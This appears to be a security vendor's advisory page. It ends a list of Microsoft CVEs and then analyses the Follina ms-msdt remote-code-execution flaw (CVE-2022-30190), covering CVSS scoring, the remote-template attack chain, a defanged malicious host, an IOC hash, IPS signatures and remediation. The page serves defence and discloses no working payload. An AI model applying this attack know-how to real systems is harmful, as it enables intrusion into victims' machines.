There are no known exploits in the wild.
CVE-2022-30148 Windows Desired State Configuration (DSC) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30149 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30150 Windows Defender Remote Credential Guard Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30151 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30152 Windows Network Address Translation (NAT) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30153 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30154 Microsoft File Server Shadow Copy Agent Service (RVSS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30155 Windows Kernel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30157 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30158 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30159 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30161 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30162 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30163 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30164 Kerberos AppContainer Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-30165 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30166 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-30168 Microsoft Photos App Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30171 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30172 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30173 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30174 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30177 Azure RTOS GUIX Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30178 Azure RTOS GUIX Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30179 Azure RTOS GUIX Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30180 Azure RTOS GUIX Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30184 .NET and Visual Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-30188 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30189 Windows Autopilot Device Management and Enrollment Client Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-30193 AV1 Video Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-32230 Windows SMB Denial of Service Vulnerability
There are no known exploits in the wild.

Follina MS-MSDT RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  CVE-2022-30190 a.k.a Follina, The Microsoft Office zero-day vulnerability allows applications like Microsoft Word to execute code (without macros) by calling MSDT (Microsoft Support Diagnostic Tool) routines using the “ms-msdt:/” protocol. It was noticed as a zero-day being exploited in the wild, but was first mentioned in 2020 in a rather interesting Bachelor’s Thesis by Benjamin Altpeter August 01st, 2020.

  The text (Bachelor’s Thesis) contains other ways to execute code via MS Protocol in Word, using templates, which still work today. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.

  Bachelor’s Thesis & MSDT

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-30190.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.3 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:T/RC:C).

  Base score is 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/), based on the following metrics:
    • Attack vector is local.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.3 (E:F/RL:T/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is temporary fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The exploit works as follows: The user opens a non-malicious Microsoft Office file (Word, Excel, RTF, …) referencing a malicious remote HTML template file. The remote file is downloaded and the embedded payload is executed, containing code to abuse the ms-msdt protocol, and invoke actions on the compromised host. Look at “Target=” search “RDF842” below:

  
  The host, www[.]xmlformats[.]com, will be visited when you open the document (and activate the content). The following payload will be fetched:

  
  Analyzing the right side of the variable “windows.location.href”. The protocol “ms-msdt:/“ is being used. MSDT (Microsoft Support Diagnostic Tool) or msdt.exe is a tool provided by Microsoft that will collect information to send to Microsoft Support. Microsoft Office will automatically process the MSDT query and execute the payload. The Base64 encoding from above contains the following:

  

  IOC: 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784.

Triggering the Problem:

  • The target system must have the vulnerable Microsoft Office application installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The vulnerability does not work with older Microsoft Office versions.

Triggering Conditions:

  The attacker sends a generated clickme.docx (or clickme.rtf) payload to the victim by www/exploit.html. The vulnerability is triggered when the user clicks on the file.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
    • SMTP
    • POP3
    • IMAP

SonicWall, provides the following protection against this threat:

  This threat is proactively detected by Capture ATP w/RTDMI.

  • IPS: 2771 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2772 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2773 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2774 Microsoft Support Diagnostic Tool RCE (Follina)
  • GAV: CVE-2022-30190.X
  • GAV: CVE-2022-30190.X_1
  • GAV: CVE-2022-30190.X_2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product or apply the vendor supplied patch.
    • Filtering attack traffic using the signatures above.
    • Follow the Microsoft Guidance for CVE-2022-30190 below.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory #1 & Vendor Advisory #2